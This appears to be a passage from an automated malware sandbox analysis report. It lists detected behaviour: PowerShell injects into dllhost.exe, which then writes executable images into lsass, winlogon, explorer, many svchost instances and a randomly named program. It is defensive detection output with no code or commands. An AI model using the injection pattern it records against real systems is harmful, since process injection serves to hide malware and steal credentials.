Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 28C0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2D00000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: FA0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2DC0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: EF0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 23F0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2E70000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: FA0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18DFB160000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1D6EE470000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1D6EE4A0000 value starts with: 4D5A Jump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\dllhost.exe Memory written: PID: 2580 base: 7DB0000 value: 4D Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 2852 Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140007000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: F2CC2D6010 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAE230000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B390000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5644B0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2108BCE0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29166900000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 7DB0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 221D5930000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DEA1600000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\MoUsoCoreWorker.exe base: 1C5C4260000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 23A94D50000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF36C0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 173E6B70000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 166801F0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\cscript.exe base: 3020000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1EB71E60000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3ED0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 227B9BA0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 232E3380000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1C06DDB0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECA6970000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1010000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2AE0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2A60000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: A90000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2DF0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 9E0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: EB0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: AA0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: FE0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 3100000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2B90000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: BB0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2C20000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2E60000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 24A0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: E40000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F40000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F40000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 850000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: D00000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 840000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F30000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F30000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1460000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 620000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2D90000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2640000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: E40000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2600000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1590000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2F90000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 890000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 3020000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2E90000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 5F0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: CF0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 25F0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 800000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: FB0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2C30000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: C00000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2CA0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2870000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2BB0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: CA0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F50000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: EE0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 11D0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1170000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 10A0000 Jump to behavior
